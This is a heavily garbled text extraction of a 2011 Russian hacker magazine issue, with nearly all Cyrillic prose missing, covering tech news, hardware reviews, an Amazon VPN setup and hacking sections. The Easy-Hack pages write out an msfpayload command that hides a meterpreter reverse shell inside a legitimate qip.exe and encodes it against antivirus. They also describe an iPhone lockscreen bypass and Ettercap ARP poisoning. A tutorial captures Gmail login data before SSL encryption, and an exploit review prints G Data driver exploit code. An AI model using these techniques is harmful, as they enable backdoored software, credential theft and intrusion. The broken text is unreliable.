7/22/2019 2011 01(144).pdf
1/148
7/22/2019 2011 01(144).pdf
2/148
:. 32
01 (144) 2011
,
2010
:210
.
ICQ
CSRSS VPN
AMAZON
7/22/2019 2011 01(144).pdf
3/148
7/22/2019 2011 01(144).pdf
4/148
, , ., Total FootballVogue :).
.
1.., 19. ,..27 28:. , .: 77, :)., , .
2.: habrahabr.ru/company/xakep/blog/.:., ..
.,.:+154 3.,,it-.
3.www.xakep.ru, , ,,,., , .
4. ,, :).:.
!nikitozz, [email protected]
vkontakte.ru/club10933209.
INTRO
7/22/2019 2011 01(144).pdf
5/148
MegaNews004
FERRUM016 -
PC_ZONE020 API Monitor API-
023
024 VPN Amazon VPN-
028 Internet Explorer 9: - Internet Explorer 9 Beta?
032 :
036 Easy-Hack
040
046
050 ! HTTP-
054 ICQ: , , ICQ
058
064
070 Top5 2010
074 X-Tools
MALWARE076 /Internet Security
078 JS- Python
082 TO-52010
089 LinuxBSD
094 OpenSource
100 ,,
104 CSRSS ,Windows 7
108 GUI Mac OS X
112
116 ,TLS
SYN/ACK120 PCI DSS
124
,?
128 Zimbra:
134
140 FAQ UNITED FAQ
143 8.5
144 WWW2 web-
CONTENT
7/22/2019 2011 01(144).pdf
6/148
/> nikitozz ([email protected])> gorl([email protected])> Forb
([email protected])PC_ZONEUNITS step([email protected]), MALWARESYN/ACKDr. Klouniz([email protected])UNIXOIDPSYCHO Andrushock ([email protected])
> DVD Step([email protected])Unix- Ant([email protected])Security- D1g1 ([email protected])
>xakep.ru ([email protected])
/ART>->
/PUBLISHING
> , 115280,, .,19,, 5,21.: +7 (495) 935-7034: +7 (495) 545-0906>>>. >>>>>>
/>GAMES & DIGITAL>
>>MAN TV>() ([email protected])>
>> ([email protected])>- ([email protected])
/> >
/:> ([email protected])>>>
>:-DVD-: [email protected].> : (495) 545-09-06: (495) 663-82-77: 8-800-200-3-999
> 101000, ,, / 652, , 77-11802 14.02.2002 Lietuvas Rivas,. 130 958 .
. . , , . . .:[email protected]
,, 2010
070Top5 2010
082 TO-52010
094
OpenSource
7/22/2019 2011 01(144).pdf
7/148X 01 (144) 2011004
MEGANEWS X ([email protected])
MEGANEWS
9 Mozilla 6- Firefox. 86% Google.
Microsoft,
Project Natal,Kinect.
-
-
.
,,
., Kinect :
.
4201010.
Adafruit Industries
Kinect.XboxUSB-,,
.,RGB--,
$1000 (Kinect$150).,,
Microsoft, , :).,
11,GitHub .
OpenKinect (www.openkinect.org)
,.
.,MIT
Kinect iRobot Create,.
,KinetBot
3D.
(),
YouTube.
-
P2P-.Dead Drop
, USB-,
.-,
5.,
Dead Drop
,.,
,-
.
- :).-
deaddrops.com, .,
.,-
offline- :).
KINECT , KINECT
7/22/2019 2011 01(144).pdf
8/148
7/22/2019 2011 01(144).pdf
9/148X 01 (144) 2011
MEGANEWS
006
Facebook, -
,
.
Facebook -
.500
Facebook, .
? eBayFacebook Mail
$500-700 !?, ..,,,
.-
,
, SMS,
@facebook.
com.
,
.Office Web
Apps,Facebook mail
Microsoft Word, ExcelPowerPoint. ?
.,-
, more fun, -
.,,
500, Facebook
, -
,GMail GoogleHotMail
Microsoft. ,Facebook
fb.com,-
(American Farm Bureau) :).
Google Android 350
.
FACEBOOK-
-
. -
,
,
, ,
, .
,
-
,
-.-
, , .
-
(firmware) ,
IMEI-,
.
.
. IMEI,
(-
),
.:
IMEI -?
.:
-
, IMEI
. .
,
-
., ,
.:
, -, ?
.
, , ,
. ,
.
7/22/2019 2011 01(144).pdf
10/148
7/22/2019 2011 01(144).pdf
11/148
MEGANEWS
008
ANDROID-
,Android.-
Black Hat, Intel.
.-HTCAndroid .,
.
proof-of-conceptGoogle Market (Angry Birds)
:,-
.Alert Logic
(,-Webkit).
: www.exploit-db.
com/exploits/15423.,,, ,.
Android 2.2, 36%.,
,
Android OS.
,Google, ,.
Google Market, Android
2.2,, -
.
,:
,,!.,
,
,.
-
(RIAA)
.FacebookRIAA,
--
,
!
RIAA
The Pirate Bay, Torrentz, Demonoid
Rapidshare.,
--
.,
,
.
X 01 (144) 2011
-
-. ,
,
, -
-. ,
,
, ,
, -
-.
.
... Google Maps.
,
-,
-
. -
(, -
) -, .
Google,,
. ,
: 2007
,
, - GPS
.:
-
, Google Maps
Wikipedia.
GOOGLE MAPS =
Skype , . 22
25 . 560 .
7/22/2019 2011 01(144).pdf
12/148009X 01 (144) 2011
.
-,11
.,,
.
240,
.
-
:
~90,
. ,
-
:
,
.,
(:)
., (:
) ..-
:
.,
,
-
. 49.5%
294.000
Ru-Center.-
,
,
.,
-
.,,
,
-
.
-
:,
.-
Ru-Center,
,,-
,
,.
,
.19
14-
.
-
.(
).
.
,
ZeuS,,.
,,-,
.,
ZeuS,
.
,
.
.
,
,-
.
,
,,-,
(MDAC, Adobe Reader, Windows Help Center, Java),
ZeuS.
,,?
,-
.,
,
,,
ZeuS-.
:
ZEUS ,-
,
-
..,,.
,,
-
.
.
glassdoor.com.,
IT-,, - (Software Engineer).-,Facebook
$110 500,$11 900.Cisco$105 720
$8 529 Yahoo $101 638 $6 197.,,
Apple, MicrosoftGoogle.
$99 127,Google $98 814 (
: $21 364). Microsoft .-, .,
CEO Google,, (
20 000)10%,$1000.-
Facebook.
7/22/2019 2011 01(144).pdf
13/148
-
!, -
AVK.Dumx.A Trojan,
(
),
.
, -
,
, , .
, -
$300 000,
SMS .-
,
-
, -
. -
, -
SMS-
,
(,
)
.-
,
, -
.
.
SMS
-.
,-
IT-,
,
,
, -
.,
.
MEGANEWS
010 X 01 (144) 2011
W3Techs , ,
, : PHP 74.9%, ASP.NET 23.8% Java 3.9%.
,Czernobyl,
,
.
Czernobyl,
AMD (Athlon
XP)-
x86.,
-
,www.woodmann.
com (,
).,
,
,
.,-
-
.
.AMD-, ,
,
,
.,
Czernobyl
,
.
-,
, .
AMD
7/22/2019 2011 01(144).pdf
14/148011X 01 (144) 2011
-E-Ink
.-..E InkE Ink Triton,4096 16 .,-,,.Triton-:, ().?.20%Pearl, KindleKindle DX., Triton-.,,HanvonTechnology.80%.,9.68-- (800600)Wi-Fi3G, $440.E Ink
LG Display.
IPHONE $40 00017---
, iPhone 4.,
,.,,
Apple.?,
. iPhone
4,.
, -
,,Foxconn.,
$130 .
,Home,-
,.
$279.,$169.,
: www.whiteiphone4now.com.
Google Tier 1. 2010 5%
, 6.4%. Google 80%.
7/22/2019 2011 01(144).pdf
15/148
MEGANEWS
X 01 (144) 2011
Windows 8 2012,
Microsoft.
Group-IB, 20%
. , $1 .
AOL
ICQ
Digital
Sky Technologies (DST),
Mail.ru Group, $187.5.
, ICQ
,
Mail.ru -
,
DST.
,,
ICQ-
. .
Nimbuzz., -
ICQ Nimbuzz :
icq-
, . Nimbuzz -
OSCAR (ICQ).,
QIP, R&Q, Miranda IM
., Mail.ru Group
ICQ Mail.Ru..,
. ICQ-
SMS
666 ICQ --,
, .:
, . ,,
. Jabber,
.
ICQ
,,
.
-
.,
,
., ,
,
.
,-
$28.
.
,
-
(
NFC Near Field Communication).
-
BlingTag,- (RFID). ,
,
-
,
PayPal
(,-
).SMS
.
,PayPal
,,
Bling Nation.
$100,
49.
.,
-
eBay
PayPal.
-
.
BlingTag20 000,
.,
,
Bling Nation,.
,
BlingTag
.
012
7/22/2019 2011 01(144).pdf
16/148013
, , .
?, ,
,.
K750 Logitech-
.
!
, .-
, K750
(?),
,
.
8.
2.4 AES
128- (Logitech Unifying).
$80,
,
:).
Google , Chrome.
, : YouTube, Orkut, Blogger,
Google Docs Gmail. $500 $3133.7.
,
, Cyborg R.A.T.9Mad
Catz.
R.A.T.,,
.
:-
255600
25., 2.4
( 1).
1000, ,
, 6
/.
,
.:,
,,
,.
6 ., Cyborg R.A.T.9
,
., -
94
.
,Cyborg R.A.T.95-.
,,
. $150.
,
X 01 (144) 2011
7/22/2019 2011 01(144).pdf
17/148
7/22/2019 2011 01(144).pdf
18/148X 01 (144) 2011 015
-
,
,
.,,,
.,,
,-
.,.
,,.
,
,.-
Samsung SCX-4600
,,
.
,
,
.,
-,
Samsung SCX-4600.,
,,,
-
:
,-
.
-.,
.
,
.,-
.
-
--
-
.,
AnyPrint,
,
-,
-
.,.
-
.
,,
AnyPrint.,
,
,,
,.
,:
,-
,
.
,,
, ,
.: 10,
(
, ,,) Samsung SCX-4600
38,9.
,-
.
Samsung SCX-4600-
, .,
, .z
SAMSUNGSCX-4600
,/:22
,:10
:1200X1200
,/:22
:1200X1200
,:250,:64
,:360
,:416X409X275.8
,:10.69
FERRUM
6500 P
7/22/2019 2011 01(144).pdf
19/148
FERRUM
X 01 (144) 2011016
FERRUM
,,
,-.
, ,-
.
,.
,, ,-?,., -
,,
-, ,
-.,
-
., , , ,
, .-
, (, )
.
, .-
, .
(),
!,
,
,
.
, , -
, ,
(
).-
.
,,
, .,
,
,
.,
.
,
:
,
., .-
, .
, /.,
,
, -, , -
.
CANYON CNR-WCAM820CREATIVE LIVE!CAM OPTIA AFGENIUS ISLIM 2020AFLOGITECH C600LOGITECH QUICKCAM SPHEREMICROSOFT LIFECAM VX-5500
-
7/22/2019 2011 01(144).pdf
20/148X 01 (144) 2011 017
-,-
.Canyon CNR-WCAM820
: () ,
, ,-
.,,
:,
,-
.,,
,
,.
,,.USB
,,
.
,,
.
.-
.,:-
.
,.,
(F/2,9),
.,
.
,,,
YouTube .
, -
.,
.
,
,,
, .
:,:2,0
(),:7,7
,/:30
:
:
CreativeLive!Cam Optia af
:,:2,0
(),:5,3
,/:30
:
:
CanyonCNR-WCAM820
2900 .1200 .
7/22/2019 2011 01(144).pdf
21/148
FERRUM
X 01 (144) 2011018
FERRUM
:,:2,0
(),:8,0
,/:30
:
:
LogitechC600
:,:2,0
(),:8,5
:1,3 9/, 2 6/
:
:
-, -,,-
, .
.,
,,-,
,.
, -.
,
, .,
: ,
..-
.
Genius iSlim2020AF
1700 . 3100 .
, ,
,
. (,)
., ,-
, :
.
,, -
.,, , -
:,
.
,-
.
.
7/22/2019 2011 01(144).pdf
22/148X 01 (144) 2011 019
:,: 2,0
(),: 8,0
,/: 30
:
:
:,: 0,3
(),: 1,3
,/: 30
:
:
Logitech QuickCamSphere
Microsoft LifeCamVX-5500
6000 . 2200 .
: ,-
.,
.
,,
.,
, ,
,
., -
, .,
, ,.
,
.,
.
.
-
, -
. ,
-.
,,
,.
,
,
.
.
-
.,
,
.
7/22/2019 2011 01(144).pdf
23/148
PC_ZONE
020
PC_ZONE
Windows
DLL, .. .
API-,
. ,
, ,
.. API-,
. (
)
.
, API-
. RegMon FileMon
. API-,
, -
. -
API-
API Monitor. ,
API-
COM-. , , .
API Monitor?: 1.5
2001 .
. !
.
,
.
.
Summary, ,
API: , DLL,
, API-
. ,
, .
10 000 API-
166 DLL', 700 600 COM-
( Shell, Browser, DirectShow, DirectSound, DirectX ..).
API
MSDN.
API Capture Filter API-,
. , API Monitor
GUID, IID REFIID, .
MSDN.
API Monitor -
, .
. CreateFileW
X 01 (144) 2011
, , ,
, - . , , , . API-.
oxdef.info;
API-
API Monitor
7/22/2019 2011 01(144).pdf
24/148
dwSareMode. , ,
1, , ? (
Parameters Decode Parametres
Values), API Monitor
FILE_SHARE_READ | FILE_SHARE_WRITE".
API-
, .
, ,
,
API-.
, ReadFile
lpBuffer API
Monitor' lpNumberOfBytesRead
() .
, (-
Hex Buffer),
,
. , ,
,
.
Summary
, ,
API-.
, .
Call Stack,
.
API , -
, -.
GetLastError, CommDlgExtendedError, WSAGetLastError.
, NTSTATUS
HRESULT . , Notepad
CreateFile, API Monitor
, . , 5,
.
API Monitor
64-.
32- 64--
. , 32-
32--
.
32- 64-
Windows, 32- API
Monitor.
hook, API Monitor
. -
: /
, .
,
. ,
, API- CreateFileA, CreateFileW
NtCreateFile, .
API Capture Filter. -,
, -
, , , ,
.
(Ctrl-F Edit Find), -
021X 01 (144) 2011
API Monitor
Firefox
DVD-
dvd
DVD
7/22/2019 2011 01(144).pdf
25/148
PC_ZONE
CreateFile. API Monitor
. -
. ,
Running Processes,
API Monitor'.
. File Hook Process,
Windows notepad.exe (
). , ,
-.
.
. ,
, .
API Monitor. Summary
, Notepad'. CreateFileW
kernel32.dll, , , NtCreateFile.
:
.
. NtCreateFile STATUS_
OBJECT_NOT_FOUND, kernel32.dll Nodepad
INVALID_HANDLE_VALUE 2 =
.
, -,
API Monitor. , NtCreateFile
STATUS_SUCCESS .
.
SSL- , API
Monitor, , -
API-.
, ,
SSL-, .
API Monitor , -
,
. , , , -
, -
. Internet Explorer:
1., -
SSL. Gmail.
2. Windows Internet. : API Monitor
.
3. Running Processes Internet Explorer
(Hook).
4. ,
.
Google SSL-. -
API-.
5. , API Monitor, API-
HttpSendRequestW. ,
: , , -, . lpOptional
(Post-Call Value). -
, Hex Buffer
, Internet Explorer .
, ASCII.
, -
.
Firefox, -
Windows Internet Netscape
Portable Runtime Mozilla SSL. , API Monitor
. , , -
PR_Write. Firefox',
. Summary PR_Write,
xul.dll. . -
POST-,
buf. , POST /
accounts/ServiceLoginAuth ( Hex Buffer). -
Pre-Call Value ,
. . , API Monitor
. ,
Tools Options Maximum size of
captured buffers. .
API-, , -
API-, (. ). ,
, API Monitor , .
DLL-, XML-,
.z
022
API-WinApiOverride API-, - API, -. , , .
kerberos WinAPI-. - API, , . *.rep .
APISpy32APISpy32 WinAPI. -, .
X 01 (144) 2011
GMail
GMail
7/22/2019 2011 01(144).pdf
26/148
7/22/2019 2011 01(144).pdf
27/148
PC_ZONE
024
PC_ZONE
(.. cloud computing) ,
, ,
. , -
. Amazon S3 -
,
, . S3
Amazon
Web Services (AWS). , -
,
().
.
Amazon Web Services Amazon , -: Amazon
Elastic Compute Cloud ( EC2), Amazon Elastic Block
Store ( EBS), Amazon Simple Storage Service ( S3).
.
, cloud computing .
EC2
.
, .
Instance.
, , root-
SSH ( Linux) -
RDP ( Windows).
.
, .
:
.
, -
, . --
.
.
-
Amazon EBS. :
X 01 (144) 2011
Amazon . , , ,
, , , VPN-.
Step twitter.com/stepah
VPN-
VPN Amazon
7/22/2019 2011 01(144).pdf
28/148
25 , .
, .
Volume
.
, ,
.
S3
, .
, , -
.
, :10 , 1 5000
, -
(5 ).
, AWS Free Usage
Tier -
.
, -
. -
. ,
750
EC2 (, ), 10 EBS
(, ,
, Ubuntu) 5 S3.
Amazon,
.
,
, , ,
.
.
VPN-,
!
Amazon'. -
AWS (aws.amazon.com)
Sing up Now.
I am a new user
Amazon.
,
. : -
,
. Amazon $1-2, -
.
Visa MasterCard:
, - Qiwi.
Amazon -
.
-
(EC2, EBS, S3
..).
. -
, 4-
PIN-,
. -
. EC2 S3
: Access Key ID Secret Access Key,
025X 01 (144) 2011
AWS
Ubuntu
:
AWS.
dvd
DVD
7/22/2019 2011 01(144).pdf
29/148
PC_ZONE
X.509 Certificate. ,
-, : Amazon
.
AWS (aws.amazon.com/
console). ,
, EC2.
c EC2,
(.. ) .
99.95%
.
Launch Instance ().
.
: Small Instance (Default) 1.7 GB of memory,
1 EC2 Compute Unit (1 virtual core with 1 EC2 Compute Unit), 160 GB of
instance storage, 32-bit platform $0.10 Unix $0.125
. , $0.10 -
$0.17 . ,
. ,
Amazon Micro
Instance. .
. AMI
(Amazon Machine Image), , ,
(, Apache, MySQL,
Memcached ..), (, -
). .
AMI-
Amazon', . Community
AMIs 6000 Linux Windows.
Ubuntu.
AMI , 15 EBS, 10
. , Ubuntu 10.04 -
ami-c2a255ab, 10 . ID
Install. -
, . ,
, Micro Instance. -
Amazon
.
, .
Instances . -
, State Running ,
. -
. Public DNS
. : , IP-
. !
Elastics IPs
IP-.
: , . ,
IP-, .
SSH,
. :
. , -
Security Group. ,
.
E2, -
Ubuntu.
SSH.
PuTTY. , Amazon pem,
PuTTY ppk. , PuTTYgen
: (Load private
key file), File.
SSH-
, :
Sessions IP- (Elastic IP)
Host Name;
Connection Data Auto-Login
ubuntu, -
;
Connection SSH Auth
private-;
Session
Save.
, ,
Open. .
PPTP, PuTTY
, Ubuntu.
026
EC2- AWS, , . Elasticfox Firefox.
AWS Access Key AWS Secret Access Key., Amazon (s3.amazonaws.com/ec2-downloads/ec2-api-tools.zip ) EC2. Java Runtime Environment.
X 01 (144) 2011
Instance: - Micro (t1.micro)
Amazon EC2
7/22/2019 2011 01(144).pdf
30/148
,
SSH-. .
, , SSH--
. :
, . , ,
VPN-. -
: OpenVPN, PPTP-.
. OpenVPN
. PPTP ,
, GRE-
. .
, Ubuntu, -
PPTP- . :
sudo aptitude install pptpd
.
IP-,
.
2 /etc/pptpd.conf:
localip 192.168.242.1
remoteip 192.168.242.2-5
PPTP
192.168.242.1, 4 :
192.168.242.2 192.168.240.5.
DNS-. Amazon
(172.16.0.23), , , Google Publuc DNS.
/etc/ppp/pptpd-options:
ms-dns 8.8.8.8
PPTP-:
sudo echo pptpd * >>
/etc/ppp/chap-secrets
. -
. /etc/ppp/chap-
secrets ,
PPTP-:
sudo /etc/init.d/pptpd restart
, -
. ,
VPN-. ,
NAT. ,
/etc/sysctl.conf :
net.ipv4.ip_forward=1
:
sudo sysctl -p
NAT, :
sudo iptables -t nat -A POSTROUTING -o eth0 -j
MASQUERADE
. :)
/etc/rc.local,
exit 0 :
iptables -t nat -A POSTROUTING -o eth0 -j
MASQUERADE
VPN . -
, - IP-
, . speedtest.net
. , , VPN
. Amazon 15
.
: 10 . :)
Amazon () -
. . EC2 -
, .
.
VPN-.
: ,
, -. ,
Amazon Instance GPU,
CUDA.
,
? z
027X 01 (144) 2011
SSH-
VPN- Windows
7/22/2019 2011 01(144).pdf
31/148
PC_ZONE
028
PC_ZONE
X 01 (144) 2011
15 - InternetExplorer 9. , .
, . :)
-Internet Explorer 9?
INTERNETEXPLORER 9:
7/22/2019 2011 01(144).pdf
32/148
, IE ,
, . :
, -
. -,
, -. -
,
. -
, -. ,
Microsoft
Server is too busy :).
,
.
favicon, , -
, .
10 , -
, . -
NumRows HKEY_CURRENT_USER\
Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage.
, :
. ,
, ,
( 20-30 ), -
-
. ,
, .
. ,
, ,
: -
. ,
. Firefox'
.
-, - Snap, Windows.
.. ,
(),
.
. -
,
. Windows 7,
IE .
Internet Explorer ,
. , ,
,
(, GMail)
.
Technical Review, InternetExplorer .
. -,
, .
, -,
. ,
,
IE9 Beta. Direct2D -
GPU.
,
GPU (
). -
. -, ,
, JavaScript-, Chakra.
JavaScript. -
. ( IE8), IE9
JS
DOM, -
(.. marshaling). -
, .
, Internet
Explorer, JS- .
, JavaScript
, .
, .
,
, - Chakra,
JavaScript WebKit's SunSpider. 17
Internet Explorer 9, Platform
Preview 7, , -
.
029X 01 (144) 2011
Internet Explorer
-
7/22/2019 2011 01(144).pdf
33/148
7/22/2019 2011 01(144).pdf
34/148
7/22/2019 2011 01(144).pdf
35/148
7/22/2019 2011 01(144).pdf
36/148
,
? ,
, , , ?
: -
= -
- + -
, .
-
:
, .
100% . ?
, ,
: ,
,
. , , -
.
Debian
Linux , ,
. - HTTP- nginx,
reverse proxy. -
, PHP-, -
. PHP--
mod_php Apache
, FastCGI,
,
. -
PHP- (, Facebook
PHP C HipHop),
-
XCache.
:
, -
, C
, MySQL -
. -
. ,
,
().
memcached. : -
,
.
"" .
, ,
, , , . ,
033X 01 (144) 2011
7/22/2019 2011 01(144).pdf
37/148
PC_ZONE
node.
js (
JavaScript ][ 08/2010) -
XMPP aka Jabber ().
ffmpeg, - VLC.
-
-,
. ..
, .. -
.
. , -
, ,
,
. ,
, - 20%.
-
,
DNS ( 32 IP-),
,
. ,
()
,
memcached -
.
, ,
,
PHP-.
Facebook (
MySQL.
,
,
opensource . -
(),
-
.
, -
:
- 8- Intel ( ,
);
- 64 ;
- 8 ;
- RAID (
).
, ,
. -
4 -
,
, .
, Content Delivery
Network
.
, -
,
. ,
: ? !.
, ,
( xfs) -
, . ,
,
:).
C. , ,
,
, , , ,
. ,
, TopCoder,
:
-
-
-
-
-
-
MySQL ,
.
memcached. -
(
).
. -
GPL, -
.
034
99,5 . 40 (-). 11 .
200 . 160/. 10 , 32 nginx ( Apache ). 30-40 , 2 , 5 -, . 10 .
Agile (), : , , ,
. (), Debian. , . memcached, ... -; , . . , -. 1 :).
X 01 (144) 2011
7/22/2019 2011 01(144).pdf
38/148
7/22/2019 2011 01(144).pdf
39/148
GreenDog [email protected]
036
:.,-
,
:).
, (
,,
),, -
,.,
-.,
.
,,
., ,-
.
.
, .
1)
2):
Emergency Call
3) 3 :
# # #
4) Call Power
! Lockscreen Bypassed!
,-, -
. (
),,.
!,
-, .
iOS 4.1,
.4.2
,
,...
.-
:).
: EXE-,
:,
IExpress,
exe', .,
.
Metasploit' (metasploit.com).
msfencode -
exe-(payload),
exe-.-
.
.qip.exe.
./msfpayload windows/meterpreter/reverse_tcp
LHOST=192.168.0.101 R | ./msfencode -t exe d ~ -x qip.
exe -k -o q_bd101.exe -e x86/shikata_ga_nai -c 3
msfpayload -
(LHOST). (R).
msfencode.(-e x86/
shikata_ga_nai) (- 3).exe- (-t exe).,exe--
(-d ~ ), qip.exe (-x qip.exe).
-k ,-
exe-.
q_bd101.exe (-o q_bd101.exe).
Exe-,,,
,
MSF.
, .-
, :).
.-,
,.- (
) .
.
-k,.-,-
,.
-, (1542
virustotal.com),.
Windows! , CRC, .-
. ,
, .
! -
,
:)
: IPHONE
2
Easy Hack
1
X 01 (144) 2011
7/22/2019 2011 01(144).pdf
40/148
: -
:
, ,.
-,: ,
:).-,,
,.,
, ,
. remote_browser Ettercap-NG (ettercap.
sourceforge.net).-,-!
.
, ettercap.conf:
1) :
nano /etc/etter.conf
2) ec_uid, ec_gid :
ec_uid = 0
ec_gid = 0
3) remote_browser :
remote_browser = "firefox http://%host%url"
,
,.
-Ettercap:
1) ettercap:
Ettercap G
2)Sniff Unified sniffing;3)Plugins Manage the plugins;
4) remote_browser;
5) :
Start Start sniffing--
.
,arp-poison.:
1) :
Hosts Scan for hosts
2) :
Hosts Host list IP_router Add to T1
3) ():
Hosts Host list IPs Add to T2
4) arp-poison:
Mitm Arp poisoning Sniff remote connection
pcap-, tcpreplay:
tcpreplay i eth0 blah_blah.pcap
.-,-
, ,
.-,,
..,,
.,,Win
Ettercap-NG.
: TCP/IP
:-,,,-
,.:
,.,,
TCP/IP,
().,,
,,
..,,
hping',-,.
,,Wireshark'a.
:)..
,,-
,.Colasoft
Packet Builder (colasoft.com/packet_builder).
.
,Windows.,-
.
,,
Ethernet, ARP, IP,
TCP, UDP.,,
:).
arp-poison GTK-Ettercap-NG
TCP/IP
3
4
X 01 (144) 2011 037
. ,
, , ,
, , -
, .
, :).
7/22/2019 2011 01(144).pdf
41/148
,
,Wireshark., Colasoft
Packet Buildercap-.Wireshark
pcap-,cappcap,
.
,,
.-
TCP (-
),-
.
, Colasoft Packet Player.
., tcpreplay,
,.
,.
,.
: TCPDUMP'
:.
,-
,,,,
,-
..tcpdump
,
.
tcpdump,WireShark'
Capture Filter,.
.
tcpdump -w test.pcap -i eth0 host 192.168.0.101 and tcp
portrange 1-1024
-i eth0 ;
-w test.pcap ,;
host 192.168.0.101 , /
192.168.0.101;
and, or ; tcp portrange 1-1024 -
tcp.
tcpdump -w test.pcap -s 1550 net 192.168 and not arp
-s 1550 , (
tcpdump' 96);
net 192.168 , /
192.168;
not arp ARP-.
tcpdump -w test.pcap src 192.168.0.101 and ( tcp port
31337 or udp \( 4523 or 5543 \))
,192.168.0.101,
31337 TCP,4523, 5543UDP.
,.
,, IP-, MAC-..
OR, ANDNOT.,
||, &&, !.,-
.,
Don't Fragment IP-,
SYN-TCP.:).
5
038
: NMAP
:.,, :).
,-/,
,.-
.,
.
(),,IP--
, .
,,
idle-,Nmap(nmap.org).Antirez
1998,()
IDIP,..
, IPID.
.
-.--
,.. .
,IPID.-
IPID.
TCP SYN--
IP.,SYN-ACK.SYN-ACK
TCP-,RST-
, IPID.
,RST-,-.RST-,
IPID.
,SYN-,IPID,
,.
IPID.
(),,
.nmap.
org/book/idlescan.html.
,.
,,,
.
,
.-
IPID,.
,
Nmap -
(-v).,IP ID Sequence Generation:
Incremental, ..-
,,
.
NSE, (nmap.org/nsedoc/
scripts/ipidseq.html).
.
:
nmap -v 192.168.0.105
192.168.0.105 IP.
idle-c:
nmap -sI 192.168.0.105 -PN -v 192.168.0.1
-sI 192.168.0.105 IP-;
-PN,,-
;
-v;
192.168.0.1.
6
X 0 1 /1 4 4 / 2 0 1 1
7/22/2019 2011 01(144).pdf
42/148
IP-,
.-,-,...
-,IDS/,-
.-,.
Idle- Nmap Wireshark
:
:,
.
. l517 (
:). code.google.com/p/l517 .
.
:
1) , -
.
2) , -.
3) .
4) -, -
.
5) (
).
5) , .
Win,,-.,
.,
.,,
;).
.z
7
- Windows
X 01 /144/ 2011 039
7/22/2019 2011 01(144).pdf
43/148
(CISS Research Team, http://twitter.com/NTarakanov)
PROFTPD
FTP Proftpd. ,
ZDI(Zero Day Initiative), 40.,
, ,
2 !
67-
e-zine'a phrack.
-
.
TARGETS
Proftpd version < 1.3.3c released.:
bugs.proftpd.org/show_bug.cgi?id=3521;
bugs.proftpd.org/show_bug.cgi?id=3519;
xorl.wordpress.com/2010/11/15/cve-2010-4221-proftpd-telnet_iac-
remote-stack-overflow/.
BRIEF
-
pr_netio_telnet_gets() src/netio.c
, Telnet IAC (Interpret As
Command) escape-. ,
, -
FTP FTPS ,
.
-
mod_site_misc.-
,
.
mod_site_misc
.
EXPLOIT
.
pr_netio_telnet_gets(),src/netio.c:
char *pr_netio_telnet_gets(char *buf, size_t buflen,
pr_netio_stream_t *in_nstrm,
pr_netio_stream_t *out_nstrm)
{
char *bp = buf;
unsignedchar cp;
int toread, handle_iac = TRUE, saw_newline = FALSE;
pr_buffer_t *pbuf = NULL;
if (buflen == 0) {
errno = EINVAL;
return NULL;
}
...
buflen--;
if (in_nstrm->strm_buf)
pbuf = in_nstrm->strm_buf;
else
pbuf = netio_buffer_alloc(in_nstrm);
while (buflen) {
...
while (buflen && toread > 0 &&
*pbuf->current != '\n' && toread--) {
cp = *pbuf->current++;
pbuf->remaining++;
...
default:
*bp++ = TELNET_IAC;
buflen--;
7/22/2019 2011 01(144).pdf
44/148
,
. interger overflow,
buffer overflow.
Kingcope: exploit-
db.com/exploits/15449.:
FreeBSD, Linux:Debuan,SUSE,CentOS.Debian Squeeze
ROP pool
buffer (cmd_rec res pr_cmd_read), UbuntuROP
: RWX , -
stub.
,Linux
(stack smashing protection) .-
,!ookie
Ubuntu 24-,
100% .
SOLUTION
proftpd-1.3.3c, -
,buflen, :).
src/netio.c
.........
+/* In the situation where the previous byte was an IAC,
we wrote IAC into the output buffer, and decremented
buflen (size of the output buffer remaining). Thus we
+ need to check here if buflen is zero, before trying to
decrement buflen again (and possibly underflowing the
buflen size_t data type).
+ */
+ if (buflen == 0) {
+ break;
+ }
*bp++ = cp;
buflen--;
.........
INTERNET EXPLORER (CVE-2010-3962)
TARGETS:Internet Explorer 6/7/8
BRIEF
Websense Security Labs., IE-
041X 01 (144) 2011
FltReleaseContext
02
7/22/2019 2011 01(144).pdf
45/148
7/22/2019 2011 01(144).pdf
46/148
7/22/2019 2011 01(144).pdf
47/14844044 X 01 (144) 2011
.text:0001DBA0 cmp [ebp+DeviceObject], 8 ;
.text:0001DBA4 jb loc_1DD19
.text:0001DBAA mov eax, [edi] ; eax
4
.text:0001DBAC mov dword_228B4, eax ; -
x-refs() dword_228B4 ,
winsock bind,
, jmp
ecx, , , !
.text:00010CD4 sub_10CD4 proc near
.text:00010CD4 mov edi, edi
.text:00010CD6 push ebp
.text:00010CD7 mov ebp, esp
.text:00010CD9 mov ecx, dword_228B4 ; ecx
.text:00010CDF xor eax, eax
.text:00010CE1 test ecx, ecx
.text:00010CE3 jz short loc_10CE8 ;
NULL
.text:00010CE5 pop ebp
.text:00010CE6 jmp ecx ; !!!
.text:00010CE8 ; ------------------------------------
.text:00010CE8
.text:00010CE8 loc_10CE8:
.text:00010CE8 pop ebp
.text:00010CE9 retn 4
.text:00010CE9 sub_10CD4 endp
EXPLOIT
DeviceIoControl,bind:
in = 0x10, out = 0x0C;
*inbuff = ring0_shellcode_address;
DeviceIoControl(hDevice,
ioctl,
(LPVOID)inbuff,
in,
(LPVOID)inbuff,
out,
&len,
NULL);
bind( ListenSocket, (SOCKADDR*) &service,
sizeof(service); // !
,,dword_228B4
,
sub_10CD4,, -
(, ,)
PageFault.
,dword_228B4NULL,
jmp ecx ().
DWORD WINAPI ResetPointer( LPVOID lpParam ) {
HANDLE hDevice;
DWORD *inbuff;
DWORD ioctl = 0x220404, in = 0x10, out = 0x0C, len;
DWORD interval = 500; // , !
Sleep(interval);
inbuff = (DWORD *)malloc(0x1000);
if(!inbuff){
printf("malloc failed!\n");
return 0;
}
*inbuff = 0;
hDevice = (HANDLE)lpParam;
DeviceIoControl(hDevice,
ioctl,
(LPVOID)inbuff,
in,
(LPVOID)inbuff,
out,
&len,
NULL);
free(inbuff);
return 0;
}
SOLUTION
Trend Micro :).
G DATA
TARGETS:
G Data TotalCare 2011
BRIEF
:
1.Race ConditionNative API
2. Ioctl
Ioctl
MiniIcptControlDevice0.
, ,
.
Ioctl 0x83170180:
.text:00010DBC cmp edx, 83170180h ;
7/22/2019 2011 01(144).pdf
48/148X 01 (144) 2011 045
.text:00010EC1 call FltReleaseContext ;
WDK,
.
,
,
.
FLT_CONTEXT.
, .,
.
, :
Step'Windbg,
-
DoFreeContext:FltReleaseContext
DoReleaseContextDoFreeContext.
.text:00011F04; int __stdcall DoFreeContext(PVOID Entry)
.text:00011F04 _DoFreeContext@4 proc near
.text:00011F04
.text:00011F04 Entry = dword ptr 8
.text:00011F04
